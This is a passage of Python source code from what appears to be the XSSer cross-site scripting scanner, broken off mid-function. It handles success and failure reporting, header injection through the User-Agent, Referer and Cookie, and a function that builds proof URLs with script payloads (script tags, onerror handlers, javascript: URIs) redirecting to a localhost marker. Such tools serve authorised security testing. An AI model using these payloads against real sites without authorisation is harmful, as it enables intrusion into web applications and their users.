  1056.             if c.info()["http-code"] in ["200", "302", "301"]:
    1057. 

  1057.                 if self.options.statistics:
    1058. 

  1058.                     self.success_connection = self.success_connection + 1
    1059. 

  1059.                 self._report_attack_success(c, dest_url, payload,
    1060. 

  1060.                                             query_string, url)
    1061. 

  1061.             else:
    1062. 

  1062.                 self._report_attack_failure(c, dest_url, payload,
    1063. 

  1063.                                             query_string, url)
    1064. 

  1064.         c.close()
    1065. 

  1065.         del c
    1066. 

  1066. 

  1067.     def encoding_permutations(self, enpayload_url):
    1068. 

  1068.         """
    1069. 

  1069.         perform encoding permutations on the url and query_string.
    1070. 

  1070.         """
    1071. 

  1071.         options = self.options
    1072. 

  1072.         if options.Cem: 
    1073. 

  1073.             enc_perm = options.Cem.split(",")
    1074. 

  1074.             for _enc in enc_perm:
    1075. 

  1075.                 enpayload_url = self.encmap[_enc](enpayload_url)
    1076. 

  1076.         else: 
    1077. 

  1077.             for enctype in list(self.encmap.keys()):
    1078. 

  1078.                 if getattr(options, enctype):
    1079. 

  1079.                     enpayload_url = self.encmap[enctype](enpayload_url)
    1080. 

  1080.         return enpayload_url
    1081. 

  1081. 

  1082.     def _report_attack_success(self, curl_handle, dest_url, payload,\
    1083. 

  1083.                                query_string, orig_url):
    1084. 

  1084.         """
    1085. 

  1085.         report connection success of an attack
    1086. 

  1086.         """
    1087. 

  1087.         if not orig_url in self.successful_urls:
    1088. 

  1088.             self.successful_urls.append(orig_url)
    1089. 

  1089.         options = self.options
    1090. 

  1090.         current_hashes = [] # to check for ongoing hashes
    1091. 

  1091.         if payload['browser'] == "[Heuristic test]":
    1092. 

  1092.             for key, value in self.hashed_injections.items():
    1093. 

  1093.                 if str(key) in dest_url:
    1094. 

  1094.                     if key not in current_hashes:
    1095. 

  1095.                         self.final_hashes[key] = value
    1096. 

  1096.                         current_hashes.append(key)
    1097. 

  1097.         elif self.options.hash:
    1098. 

  1098.             for key, value in self.hashed_injections.items():
    1099. 

  1099.                 self.final_hashes[key] = value
    1100. 

  1100.                 current_hashes.append(key)
    1101. 

  1101.         else:
    1102. 

  1102.             self.report("-"*45)
    1103. 

  1103.             self.report("\n[!] Hashing: \n")
    1104. 

  1104.             for key, value in self.hashed_injections.items():
    1105. 

  1105.                 if str(key) in dest_url:
    1106. 

  1106.                     if key not in current_hashes:
    1107. 

  1107.                         self.report(" [ " +key+" ] : [" , value + " ]")
    1108. 

  1108.                         self.final_hashes[key] = value
    1109. 

  1109.                         current_hashes.append(key)
    1110. 

  1110.                 else:
    1111. 

  1111.                     if payload["browser"] == "[Data Control Protocol Injection]": # [DCP Injection]
    1112. 

  1112.                         b64_string = payload["payload"].split("[B64]")
    1113. 

  1113.                         b64_string = b64_string[1]
    1114. 

  1114.                         b64_string = b64_string.replace('PAYLOAD', key)
    1115. 

  1115.                         b64_string = b64encode(b64_string)
    1116. 

  1116.                         b64_string = urllib.parse.urlencode({'':b64_string})
    1117. 

  1117.                         if b64_string.startswith("="):
    1118. 

  1118.                             b64_string = b64_string.replace("=", "")
    1119. 

  1119.                         if str(b64_string) in str(dest_url):
    1120. 

  1120.                             if key not in current_hashes:
    1121. 

  1121.                                 self.report(" [ " +key+" ] : [" , value + " ]")
    1122. 

  1122.                                 self.final_hashes[key] = value
    1123. 

  1123.                                 current_hashes.append(key)
    1124. 

  1124.                     else: # when using encoders (Str, Hex, Dec...)
    1125. 

  1125.                         payload_string = payload["payload"].replace("PAYLOAD", key)
    1126. 

  1126.                         hashed_payload = self.encoding_permutations(payload_string)
    1127. 

  1127.                         if self.options.Cem:
    1128. 

  1128.                             enc_perm = options.Cem.split(",")
    1129. 

  1129.                             for e in enc_perm:
    1130. 

  1130.                                 hashed_payload = self.encoding_permutations(payload_string)
    1131. 

  1131.                                 if e == "Str":
    1132. 

  1132.                                     hashed_payload = hashed_payload.replace(",", "%2C")
    1133. 

  1133.                                 if e == "Mix":
    1134. 

  1134.                                     hashed_payload=urllib.parse.quote(hashed_payload)
    1135. 

  1135.                                 if e == "Dec":
    1136. 

  1136.                                     hashed_payload = hashed_payload.replace("&#", "%26%23")
    1137. 

  1137.                                 if e == "Hex":
    1138. 

  1138.                                     hashed_payload = hashed_payload.replace("%", "%25")
    1139. 

  1139.                                 if e == "Hes":
    1140. 

  1140.                                     hashed_payload = hashed_payload.replace("&#", "%26%23")
    1141. 

  1141.                                     hashed_payload = hashed_payload.replace(";", "%3B")
    1142. 

  1142.                         else:
    1143. 

  1143.                             if self.options.Str:
    1144. 

  1144.                                 hashed_payload = hashed_payload.replace(",", "%2C")
    1145. 

  1145.                             if self.options.Mix:
    1146. 

  1146.                                 hashed_payload=urllib.parse.quote(hashed_payload)
    1147. 

  1147.                             if self.options.Dec:
    1148. 

  1148.                                 hashed_payload = hashed_payload.replace("&#", "%26%23")
    1149. 

  1149.                             if self.options.Hex:
    1150. 

  1150.                                 hashed_payload = hashed_payload.replace("%", "%25")
    1151. 

  1151.                             if self.options.Hes:
    1152. 

  1152.                                 hashed_payload = hashed_payload.replace("&#", "%26%23")
    1153. 

  1153.                                 hashed_payload = hashed_payload.replace(";", "%3B")
    1154. 

  1154.                         if str(hashed_payload) in str(dest_url):
    1155. 

  1155.                             if key not in current_hashes:
    1156. 

  1156.                                 self.report(" [ " +key+" ] : [" , value + " ]")
    1157. 

  1157.                                 self.final_hashes[key] = value
    1158. 

  1158.             if self.extra_hashed_injections:
    1159. 

  1159.                 for k, v in self.extra_hashed_injections.items():
    1160. 

  1160.                     payload_url = str(v[1])
    1161. 

  1161.                     if payload_url == payload["payload"]:
    1162. 

  1162.                         if k not in current_hashes:
    1163. 

  1163.                             self.report(" [ " +k+" ] : [" , v[0] + " ]")
    1164. 

  1164.                             self.final_hashes[k] = v[0]
    1165. 

  1165.                             current_hashes.append(k)
    1166. 

  1166.             self.report("\n"+"-"*45+"\n")
    1167. 

  1167.         if payload['browser'] == "[Heuristic test]":
    1168. 

  1168.             self.report("[+] Checking: " + str(payload['payload']).strip('XSS'), "\n")
    1169. 

  1169.         else:
    1170. 

  1170.             if self.extra_hashed_injections:
    1171. 

  1171.                 extra_attacks=[]
    1172. 

  1172.                 if options.xsa:
    1173. 

  1173.                     extra_attacks.append("XSA")
    1174. 

  1174.                 if options.xsr:
    1175. 

  1175.                     extra_attacks.append("XSR")
    1176. 

  1176.                 if options.coo:
    1177. 

  1177.                     extra_attacks.append("COO")
    1178. 

  1178.                 if extra_attacks:
    1179. 

  1179.                     extra_attacks = "+ "+ str(extra_attacks)
    1180. 

  1180.                 if options.postdata:
    1181. 

  1181.                     self.report("[*] Trying: " + extra_attacks + "\n\n" + orig_url.strip(), "(POST:", query_string + ") \n")
    1182. 

  1182.                 else:
    1183. 

  1183.                     self.report("[*] Trying: " + extra_attacks + "\n\n" + dest_url.strip()+"\n")
    1184. 

  1184.             else:
    1185. 

  1185.                 if options.postdata:
    1186. 

  1186.                     self.report("[*] Trying: \n\n" + orig_url.strip(), "(POST:", query_string + ")\n")
    1187. 

  1187.                 else:
    1188. 

  1188.                     self.report("[*] Trying: \n\n" + dest_url.strip() + "\n")
    1189. 

  1189.             if not self.options.hash and not self.options.script:
    1190. 

  1190.                 if not "XSS" in dest_url or not "X1S" in dest_url and self.options.xsa or self.options.xsr or self.options.coo:
    1191. 

  1191.                     pass
    1192. 

  1192.                 else:
    1193. 

  1193.                     self.report("-"*45)
    1194. 

  1194.         if payload['browser'] == "[Heuristic test]" or payload['browser'] == "[hashed_precheck_system]" or payload['browser'] == "[manual_injection]":
    1195. 

  1195.             pass
    1196. 

  1196.         else:
    1197. 

  1197.             if not "XSS" in dest_url or not "X1S" in dest_url:
    1198. 

  1198.                 if self.options.xsa or self.options.xsr or self.options.coo:
    1199. 

  1199.                     pass
    1200. 

  1200.                 else:
    1201. 

  1201.                     self.report("-"*45)
    1202. 

  1202.                     self.report("\n[+] Vulnerable(s): \n\n " + payload['browser'] + "\n")
    1203. 

  1203.                     if not self.options.verbose:
    1204. 

  1204.                         self.report("-"*45 + "\n")
    1205. 

  1205.             else:
    1206. 

  1206.                 self.report("-"*45)
    1207. 

  1207.                 self.report("\n[+] Vulnerable(s): \n\n " + payload['browser'] + "\n")
    1208. 

  1208.                 if not self.options.verbose:
    1209. 

  1209.                     self.report("-"*45 + "\n")
    1210. 

  1210. 	    # statistics injections counters
    1211. 

  1211.         if payload['browser']=="[hashed_precheck_system]" or payload['browser']=="[Heuristic test]":
    1212. 

  1212.             self.check_positives = self.check_positives + 1
    1213. 

  1213.         elif payload['browser']=="[Data Control Protocol Injection]":
    1214. 

  1214.             self.dcp_injection = self.dcp_injection + 1
    1215. 

  1215.         elif payload['browser']=="[Document Object Model Injection]":
    1216. 

  1216.             self.dom_injection = self.dom_injection + 1
    1217. 

  1217.         elif payload['browser']=="[Induced Injection]":
    1218. 

  1218.             self.httpsr_injection = self.httpsr_injection + 1
    1219. 

  1219.         elif payload['browser']=="[manual_injection]":
    1220. 

  1220.             self.manual_injection = self.manual_injection + 1
    1221. 

  1221.         else:
    1222. 

  1222.             self.auto_injection = self.auto_injection +1
    1223. 

  1223.         if not self.hashed_injections:
    1224. 

  1224.             for k, v in self.extra_hashed_injections.items():
    1225. 

  1225.                 if k in current_hashes:
    1226. 

  1226.                     if v[0] == "XSA":
    1227. 

  1227.                         agent = v[1]
    1228. 

  1228.                         agent = agent.replace("PAYLOAD", k)
    1229. 

  1229.                         Curl.agent = agent
    1230. 

  1230.                     if v[0] == "XSR":
    1231. 

  1231.                         referer = v[1]
    1232. 

  1232.                         referer = referer.replace("PAYLOAD", k)
    1233. 

  1233.                         Curl.referer = referer
    1234. 

  1234.                     if v[0] == "COO":
    1235. 

  1235.                         cookie = v[1]
    1236. 

  1236.                         cookie = cookie.replace("PAYLOAD", k)
    1237. 

  1237.                         Curl.cookie = cookie
    1238. 

  1238.         else:
    1239. 

  1239.             for key, value in self.hashed_injections.items():
    1240. 

  1240.                 for k, v in self.extra_hashed_injections.items():
    1241. 

  1241.                     payload_url = v[1]
    1242. 

  1242.                     payload_url = payload_url.replace("PAYLOAD",key)
    1243. 

  1243.                     payload_url = payload_url.replace(" ", "+") # black magic!
    1244. 

  1244.                     final_dest_url = str(urllib.parse.unquote(dest_url.strip()))
    1245. 

  1245.                     if payload_url in final_dest_url:
    1246. 

  1246.                         if v[0] == "XSA":
    1247. 

  1247.                             agent = v[1]
    1248. 

  1248.                             agent = agent.replace("PAYLOAD", k)
    1249. 

  1249.                             Curl.agent = agent
    1250. 

  1250.                         if v[0] == "XSR":
    1251. 

  1251.                             referer = v[1]
    1252. 

  1252.                             referer = referer.replace("PAYLOAD", k)
    1253. 

  1253.                             Curl.referer = referer
    1254. 

  1254.                         if v[0] == "COO":
    1255. 

  1255.                             cookie = v[1]
    1256. 

  1256.                             cookie = cookie.replace("PAYLOAD", k)
    1257. 

  1257.                             Curl.cookie = cookie
    1258. 

  1258.                     else:
    1259. 

  1259.                         if k in current_hashes:
    1260. 

  1260.                             if v[0] == "XSA":
    1261. 

  1261.                                 agent = v[1]
    1262. 

  1262.                                 agent = agent.replace("PAYLOAD", k)
    1263. 

  1263.                                 Curl.agent = agent
    1264. 

  1264.                             if v[0] == "XSR":
    1265. 

  1265.                                 referer = v[1]
    1266. 

  1266.                                 referer = referer.replace("PAYLOAD", k)
    1267. 

  1267.                                 Curl.referer = referer
    1268. 

  1268.                             if v[0] == "COO":
    1269. 

  1269.                                 cookie = v[1]
    1270. 

  1270.                                 cookie = cookie.replace("PAYLOAD", k)
    1271. 

  1271.                                 Curl.cookie = cookie
    1272. 

  1272.         if options.verbose:
    1273. 

  1273.             self.report("-"*45)
    1274. 

  1274.             self.report("\n[+] HTTP Headers Verbose:\n")
    1275. 

  1275.             self.report(" [Client Request]")
    1276. 

  1276.             Curl.print_options()
    1277. 

  1277.             self.report(" [Server Reply]\n")
    1278. 

  1278.             self.report(curl_handle.info())
    1279. 

  1279.         self.report("="*45)
    1280. 

  1280.         self.report("[*] Injection(s) Results:")
    1281. 

  1281.         self.report("="*45 + "\n")
    1282. 

  1282.         if payload['browser']=="[Heuristic test]":
    1283. 

  1283.             for key, value in self.final_hashes.items():
    1284. 

  1284.                 if str(key) in dest_url:
    1285. 

  1285.                     heuristic_string = key
    1286. 

  1286.                     heuristic_param = str(payload['payload']).strip('XSS')
    1287. 

  1287.                     # checking heuristic responses
    1288. 

  1288.                     if heuristic_string in curl_handle.body():
    1289. 

  1289.                         # ascii
    1290. 

  1290.                         if heuristic_param == "\\":
    1291. 

  1291.                             self.heuris_backslash_found = self.heuris_backslash_found + 1
    1292. 

  1292.                         # / same as ASCII and Unicode
    1293. 

  1293.                         elif heuristic_param == "/":
    1294. 

  1294.                             self.heuris_slash_found = self.heuris_slash_found + 1
    1295. 

  1295.                             self.heuris_une_slash_found = self.heuris_une_slash_found + 1
    1296. 

  1296.                         elif heuristic_param == ">":
    1297. 

  1297.                             self.heuris_mayor_found = self.heuris_mayor_found + 1
    1298. 

  1298.                         elif heuristic_param == "<":
    1299. 

  1299.                             self.heuris_minor_found = self.heuris_minor_found + 1
    1300. 

  1300.                         elif heuristic_param == ";":
    1301. 

  1301.                             self.heuris_semicolon_found = self.heuris_semicolon_found + 1
    1302. 

  1302.                         elif heuristic_param == "'":
    1303. 

  1303.                             self.heuris_colon_found = self.heuris_colon_found + 1
    1304. 

  1304.                         elif heuristic_param == '"':
    1305. 

  1305.                             self.heuris_doublecolon_found = self.heuris_doublecolon_found + 1
    1306. 

  1306.                         elif heuristic_param == "=":
    1307. 

  1307.                             self.heuris_equal_found = self.heuris_equal_found + 1
    1308. 

  1308.                         # une
    1309. 

  1309.                         elif heuristic_param == "%5C":
    1310. 

  1310.                             self.heuris_une_backslash_found = self.heuris_une_backslash_found + 1
    1311. 

  1311.                         elif heuristic_param == "%3E":
    1312. 

  1312.                             self.heuris_une_mayor_found = self.heuris_une_mayor_found + 1
    1313. 

  1313.                         elif heuristic_param == "%3C":
    1314. 

  1314.                             self.heuris_une_minor_found = self.heuris_une_minor_found + 1
    1315. 

  1315.                         elif heuristic_param == "%3B":
    1316. 

  1316.                             self.heuris_une_semicolon_found = self.heuris_une_semicolon_found + 1
    1317. 

  1317.                         elif heuristic_param == "%27":
    1318. 

  1318.                             self.heuris_une_colon_found = self.heuris_une_colon_found + 1
    1319. 

  1319.                         elif heuristic_param == "%22":
    1320. 

  1320.                             self.heuris_une_doublecolon_found = self.heuris_une_doublecolon_found + 1
    1321. 

  1321.                         elif heuristic_param == "%3D":
    1322. 

  1322.                             self.heuris_une_equal_found = self.heuris_une_equal_found + 1
    1323. 

  1323.                         # dec
    1324. 

  1324.                         elif heuristic_param == "&#92":
    1325. 

  1325.                             self.heuris_dec_backslash_found = self.heuris_dec_backslash_found + 1
    1326. 

  1326.                         elif heuristic_param == "&#47":
    1327. 

  1327.                             self.heuris_dec_slash_found = self.heuris_dec_slash_found + 1
    1328. 

  1328.                         elif heuristic_param == "&#62":
    1329. 

  1329.                             self.heuris_dec_mayor_found = self.heuris_dec_mayor_found + 1
    1330. 

  1330.                         elif heuristic_param == "&#60":
    1331. 

  1331.                             self.heuris_dec_minor_found = self.heuris_dec_minor_found + 1
    1332. 

  1332.                         elif heuristic_param == "&#59":
    1333. 

  1333.                             self.heuris_dec_semicolon_found = self.heuris_dec_semicolon_found + 1
    1334. 

  1334.                         elif heuristic_param == "&#39":
    1335. 

  1335.                             self.heuris_dec_colon_found = self.heuris_dec_colon_found + 1
    1336. 

  1336.                         elif heuristic_param == "&#34":
    1337. 

  1337.                             self.heuris_dec_doublecolon_found = self.heuris_dec_doublecolon_found + 1
    1338. 

  1338.                         elif heuristic_param == "&#61":
    1339. 

  1339.                             self.heuris_dec_equal_found = self.heuris_dec_equal_found + 1
    1340. 

  1340.                         self.add_success(dest_url, heuristic_param, value, query_string, orig_url, 'heuristic') # success!
    1341. 

  1341.                     else:
    1342. 

  1342.                         if heuristic_param == "\\":
    1343. 

  1343.                             self.heuris_backslash_notfound = self.heuris_backslash_notfound + 1
    1344. 

  1344.                         elif heuristic_param == "/":
    1345. 

  1345.                             self.heuris_slash_notfound = self.heuris_slash_notfound + 1
    1346. 

  1346.                         elif heuristic_param == ">":
    1347. 

  1347.                             self.heuris_mayor_notfound = self.heuris_mayor_notfound + 1
    1348. 

  1348.                         elif heuristic_param == "<":
    1349. 

  1349.                             self.heuris_minor_notfound = self.heuris_minor_notfound + 1
    1350. 

  1350.                         elif heuristic_param == ";":
    1351. 

  1351.                             self.heuris_semicolon_notfound = self.heuris_semicolon_notfound + 1
    1352. 

  1352.                         elif heuristic_param == "'":
    1353. 

  1353.                             self.heuris_colon_notfound = self.heuris_colon_notfound + 1
    1354. 

  1354.                         elif heuristic_param == '"':
    1355. 

  1355.                             self.heuris_doublecolon_notfound = self.heuris_doublecolon_notfound + 1
    1356. 

  1356.                         elif heuristic_param == "=":
    1357. 

  1357.                             self.heuris_equal_notfound = self.heuris_equal_notfound + 1
    1358. 

  1358.                         self.add_failure(dest_url, heuristic_param, value, query_string, orig_url, 'heuristic') # heuristic fail
    1359. 

  1359.         elif self.options.hash:
    1360. 

  1360.             for key, value in self.final_hashes.items():
    1361. 

  1361.                 if str(key) in dest_url:
    1362. 

  1362.                     if key in curl_handle.body():
    1363. 

  1363.                         self.add_success(dest_url, key, value, query_string, orig_url, 'hashing check') # success!
    1364. 

  1364.                     else:
    1365. 

  1365.                         self.add_failure(dest_url, key, value, query_string, orig_url, 'hashing check') # hashing_check fail
    1366. 

  1366.         else:
    1367. 

  1367.             for key, value in self.final_hashes.items(): 
    1368. 

  1368.                 if key in current_hashes:
    1369. 

  1369.                     if "XSA" in value:
    1370. 

  1370.                         method = "XSA"
    1371. 

  1371.                         hashing = key
    1372. 

  1372.                     elif "XSR" in value:
    1373. 

  1373.                         method = "XSR"
    1374. 

  1374.                         hashing = key
    1375. 

  1375.                     elif "COO" in value:
    1376. 

  1376.                         method = "COO"
    1377. 

  1377.                         hashing = key
    1378. 

  1378.                     else:
    1379. 

  1379.                         method = value
    1380. 

  1380.                         hashing = key
    1381. 

  1381.                     if not hashing:
    1382. 

  1382.                         pass
    1383. 

  1383.                     else:
    1384. 

  1384.                         if hashing not in dest_url:
    1385. 

  1385.                             if key in current_hashes:
    1386. 

  1386.                                 if payload["browser"] == "[Data Control Protocol Injection]": # [DCP Injection]
    1387. 

  1387.                                     b64_string = payload["payload"].split("[B64]")
    1388. 

  1388.                                     b64_string = b64_string[1]
    1389. 

  1389.                                     b64_string = b64_string.replace('PAYLOAD', key)
    1390. 

  1390.                                     b64_string = b64encode(b64_string)
    1391. 

  1391.                                     b64_string = urllib.parse.urlencode({'':b64_string})
    1392. 

  1392.                                     if b64_string.startswith("="):
    1393. 

  1393.                                         b64_string = b64_string.replace("=", "")
    1394. 

  1394.                                     if str(b64_string) in str(dest_url):
    1395. 

  1395.                                         self.check_hash_on_target(hashing, dest_url, orig_url, payload, query_string, method, curl_handle)                            
    1396. 

  1396.                                 else:
    1397. 

  1397.                                     self.check_hash_on_target(hashing, dest_url, orig_url, payload, query_string, method, curl_handle)                            
    1398. 

  1398.                         else:
    1399. 

  1399.                             self.check_hash_on_target(hashing, dest_url, orig_url, payload, query_string, method, curl_handle)
    1400. 

  1400.         self.report("")
    1401. 

  1401. 

  1402.     def check_hash_on_target(self, hashing, dest_url, orig_url, payload, query_string, method, curl_handle):
    1403. 

  1403.         options = self.options
    1404. 

  1404.         c_info = str(curl_handle.info())
    1405. 

  1405.         c_body = str(curl_handle.body())
    1406. 

  1406.         if payload["browser"] == "[Data Control Protocol Injection]": # [DCP Injection]
    1407. 

  1407.             b64_string = payload["payload"].split("[B64]")
    1408. 

  1408.             b64_string = b64_string[1]
    1409. 

  1409.             b64_string = b64_string.replace('PAYLOAD', hashing)
    1410. 

  1410.             b64_string = b64encode(b64_string)
    1411. 

  1411.             if b64_string.startswith("="):
    1412. 

  1412.                 b64_string = b64_string.replace("=", "")
    1413. 

  1413.             hashing = b64_string
    1414. 

  1414.         if str(hashing) in c_body and "http-code: 200" in c_info: # only add a success if hashing is on body and we have HTTP 200-OK [XSS CHECKPOINT!]
    1415. 

  1415.             # some anti false positives checkers
    1416. 

  1416.             if str(options.discode) in curl_handle.body(): # provided by user
    1417. 

  1417.                 self.report("[Info] Reply contains code [ --discode ] provided to be discarded... forcing failure!\n")
    1418. 

  1418.                 self.add_failure(dest_url, payload, hashing, query_string, orig_url, method) # failed!
    1419. 

  1419.             else:
    1420. 

  1420.                 if str('/&gt;' + hashing) in curl_handle.body() or str('href=' + dest_url + hashing) in curl_handle.body() or str('content=' + dest_url + hashing) in curl_handle.body():
    1421. 

  1421.                     self.report("[Info] Reply looks like a -false positive- from here. Check it, manually... forcing discard!\n")
    1422. 

  1422.                     self.add_failure(dest_url, payload, hashing, query_string, orig_url, method) # failed!
    1423. 

  1423.                 else:
    1424. 

  1424.                     if options.discode:
    1425. 

  1425.                         self.report("[Info] Reply does NOT contain code [ --discode ] provided to be discarded... adding! ;-)\n")
    1426. 

  1426.                     self.add_success(dest_url, payload, hashing, query_string, orig_url, method) # success!       
    1427. 

  1427.         else:
    1428. 

  1428.             self.add_failure(dest_url, payload, hashing, query_string, orig_url, method) # failed!
    1429. 

  1429. 

  1430.     def add_failure(self, dest_url, payload, hashing, query_string, orig_url, method='url'):
    1431. 

  1431.         """
    1432. 

  1432.         Add an attack that failed to inject
    1433. 

  1433.         """
    1434. 

  1434.         if method == "heuristic":
    1435. 

  1435.             self.report(" [ NOT-FOUND ] -> [ " + str(payload) + " ] : [ " + str(hashing)+ " ]")
    1436. 

  1436.             self.hash_notfound.append((dest_url, "[Heuristic test]", method, hashing, query_string, payload, orig_url))
    1437. 

  1437.         elif method == "hashing check":
    1438. 

  1438.             self.report(" [ NOT-FOUND ] -> [ " + str(hashing) + " ] : [ hashing_check ]")
    1439. 

  1439.             self.hash_notfound.append((dest_url, "[hashing check]", method, hashing, query_string, payload, orig_url))
    1440. 

  1440.         else:
    1441. 

  1441.             self.report(" [ NOT-FOUND ] -> [ " + hashing + " ] : [ " + method + " ]")
    1442. 

  1442.             self.hash_notfound.append((dest_url, payload['browser'], method, hashing, query_string, payload, orig_url))
    1443. 

  1443.           
    1444. 

  1444.     def add_success(self, dest_url, payload, hashing, query_string, orig_url, method='url'):
    1445. 

  1445.         """
    1446. 

  1446.         Add an attack that managed to inject the code
    1447. 

  1447.         """
    1448. 

  1448.         if method == "heuristic":
    1449. 

  1449.             self.report(" [ FOUND! ] -> [ " + str(payload) + " ] : [ " + str(hashing)+ " ]")
    1450. 

  1450.             self.hash_found.append((dest_url, "[Heuristic test]", method, hashing, query_string, payload, orig_url))
    1451. 

  1451.         elif method == "hashing check":
    1452. 

  1452.             self.report(" [ FOUND! ] -> [ " + str(payload) + " ] : [ " + str(hashing)+ " ]")
    1453. 

  1453.             self.hash_found.append((dest_url, "[hashing check]", method, hashing, query_string, payload, orig_url))
    1454. 

  1454.         else:
    1455. 

  1455.             payload_sub =  payload['payload']
    1456. 

  1456.             self.report(" [ FOUND! ] -> [ " + hashing + " ] : [ " + method + " ] -> [ " + payload_sub + " ]")
    1457. 

  1457.             self.hash_found.append((dest_url, payload['browser'], method, hashing, query_string, payload, orig_url))
    1458. 

  1458.         for reporter in self._reporters:
    1459. 

  1459.             reporter.add_success(dest_url)
    1460. 

  1460.         if self.options.reversecheck:
    1461. 

  1461.             if self.options.dcp or self.options.inducedcode or self.options.dom:
    1462. 

  1462.                 pass
    1463. 

  1463.             else:
    1464. 

  1464.                 self.do_token_check(orig_url, hashing, payload, query_string, dest_url)
    1465. 

  1465. 

  1466.     def do_token_check(self, orig_url, hashing, payload, query_string, dest_url):
    1467. 

  1467.         if "VECTOR" in orig_url:
    1468. 

  1468.             dest_url = orig_url
    1469. 

  1469.         else:
    1470. 

  1470.             if not dest_url.endswith("/"):
    1471. 

  1471.                 dest_url = dest_url + "/"
    1472. 

  1472.             dest_url = orig_url + query_string + payload['payload']
    1473. 

  1473. 

  1474.         tok_url = None
    1475. 

  1475.         self_url = "http://localhost:19084/success/" + hashing
    1476. 

  1476.         shadow_js_inj = "document.location=document.location.hash.substring(1)"
    1477. 

  1477.         shadow_inj = "<script>" + shadow_js_inj + "</script>"
    1478. 

  1478.         shadow_js_inj = shadow_js_inj
    1479. 

  1479.         dest_url = dest_url.split("#")[0]
    1480. 

  1480. 

  1481.         def requote(what):
    1482. 

  1482.             return urllib.parse.quote_plus(what)
    1483. 

  1483.         vector_and_payload = payload['payload']
    1484. 

  1484.         _e = self.encoding_permutations
    1485. 

  1485.         if 'XSS' in dest_url:
    1486. 

  1486.             dest_url = dest_url.replace('XSS', vector_and_payload)
    1487. 

  1487.         if 'X1S' in dest_url:
    1488. 

  1488.             dest_url = dest_url.replace('XSS', vector_and_payload)
    1489. 

  1489.         if 'VECTOR' in dest_url:
    1490. 

  1490.             dest_url = dest_url.replace('VECTOR', vector_and_payload)
    1491. 

  1491.         if '">PAYLOAD' in dest_url:
    1492. 

  1492.             tok_url = dest_url.replace('">PAYLOAD', _e('">' + shadow_inj))
    1493. 

  1493.             tok_url += '#' + self_url
    1494. 

  1494.         elif "'>PAYLOAD" in dest_url:
    1495. 

  1495.             tok_url = dest_url.replace("'>PAYLOAD", _e("'>" + shadow_inj))
    1496. 

  1496.             tok_url += '#' + self_url
    1497. 

  1497.         elif "javascript:PAYLOAD" in dest_url:
    1498. 

  1498.             tok_url = dest_url.replace('javascript:PAYLOAD',
    1499. 

  1499.                                        self.encoding_permutations("window.location='" + self_url+"';"))
    1500. 

  1500.             tok_url = dest_url.replace("javascript:PAYLOAD",
    1501. 

  1501.                                        _e("javascript:" + shadow_js_inj))
    1502. 

  1502.             tok_url+= '#' + self_url
    1503. 

  1503.         elif '"PAYLOAD"' in dest_url:
    1504. 

  1504.             tok_url = dest_url.replace('"PAYLOAD"', '"' + self_url + '"')
    1505. 

  1505.         elif "'PAYLOAD'" in dest_url:
    1506. 

  1506.             tok_url = dest_url.replace("'PAYLOAD'", "'" + self_url + "'")
    1507. 

  1507.         elif 'PAYLOAD' in dest_url and 'SRC' in dest_url:
    1508. 

  1508.             tok_url = dest_url.replace('PAYLOAD', self_url)
    1509. 

  1509.         elif "SCRIPT" in dest_url:
    1510. 

  1510.             tok_url = dest_url.replace('PAYLOAD',
    1511. 

  1511.                                       shadow_js_inj)
    1512. 

  1512.             tok_url += '#' + self_url
    1513. 

  1513.         elif 'onerror="PAYLOAD"' in dest_url:
    1514. 

  1514.             tok_url = dest_url.replace('onerror="PAYLOAD"', _e('onerror="' + shadow_inj + '"'))
    1515. 

  1515.             tok_url+= '#' + self_url
    1516. 

  1516.         elif 'onerror="javascript:PAYLOAD"' in dest_url:
    1517. 

  1517.             tok_url = dest_url.replace('javascript:PAYLOAD',
    1518. 

  1518.             				self.encoding_permutations("window.location='" + self_url+"';"))
    1519. 

  1519.             tok_url = dest_url.replace('onerror="javascript:PAYLOAD"',
    1520. 

  1520.                                        _e('onerror="javascript:' + shadow_js_inj + '"'))
    1521. 

  1521.             tok_url+= '#' + self_url
    1522. 

  1522.         elif '<PAYLOAD>' in dest_url:
    1523. 

  1523.             tok_url = dest_url.replace("<PAYLOAD>", _e(shadow_inj))
    1524. 

  1524.             tok_url+= '#' + self_url
    1525. 

  1525.         elif 'PAYLOAD' in dest_url:
    1526. 

  1526.             tok_url = dest_url.replace("PAYLOAD", _e(shadow_inj))
    1527. 

  1527.             tok_url+= '#' + self_url
    1528. 

  1528.         elif 'href' in dest_url and 'PAYLOAD' in dest_url:
    1529. 

  1529.             tok_url = dest_url.replace('PAYLOAD', self_url)
    1530. 

  1530.         elif 'HREF' in dest_url and 'PAYLOAD' in dest_url:
    1531. 

  1531.             tok_url = dest_url.replace('PAYLOAD', self_url)
    1532. 

  1532.         elif 'url' in dest_url and 'PAYLOAD' in dest_url:
    1533. 

  1533.             tok_url = dest_url.replace('PAYLOAD', self_url)
    1534. 

  1534.         self.final_attacks[hashing] = {'url': tok_url}
    1535. 

  1535.         if tok_url:
    1536. 

  1536.             try:
    1537. 

  1537.                 if self.options.reverseopen:
    1538. 

  1538.                     self.report("\n" + "-"*25+"\n")
    1539. 

  1539.                     self.report("[Info] Launching web browser (default) with a 'token' url...")
    1540. 

  1540.                     self._webbrowser.open(tok_url)
    1541. 

  1541.             except:
    1542. 

  1542.                 pass
    1543. 

  1543. 

  1544.     def _report_attack_failure(self, curl_handle, dest_url, payload,\
    1545. 

  1545.                                query_string, orig_url):
    1546. 

  1546.         """
    1547. 

  1547.         report connection failure of an attack
    1548. 

  1548.         """
    1549. 

  1549.         options = self.options
    1550. 

  1550.         current_hashes = [] # to check for ongoing hashes
    1551. 

  1551.         if payload['browser'] == "[Heuristic test]":
    1552. 

  1552.             for key, value in self.hashed_injections.items():
    1553. 

  1553.                 if key not in current_hashes:
    1554. 

  1554.                     self.final_hashes[key] = value
    1555. 

  1555.                     current_hashes.append(key)
    1556. 

  1556.         elif self.options.hash:
    1557. 

  1557.             for key, value in self.hashed_injections.items():
    1558. 

  1558.                 self.final_hashes[key] = value
    1559. 

  1559.                 current_hashes.append(key)
    1560. 

  1560.         else:
    1561. 

  1561.             self.report("-"*45)
    1562. 

  1562.             self.report("\n[!] Hashing: \n")
    1563. 

  1563.             for key, value in self.hashed_injections.items():
    1564. 

  1564.                 if str(key) in str(dest_url): # GET
    1565. 

  1565.                     if key not in current_hashes:
    1566. 

  1566.                         self.report(" [ " +key+" ] : [" , value + " ]")
    1567. 

  1567.                         self.final_hashes[key] = value
    1568. 

  1568.                         current_hashes.append(key)
    1569. 

  1569.                 else:
    1570. 

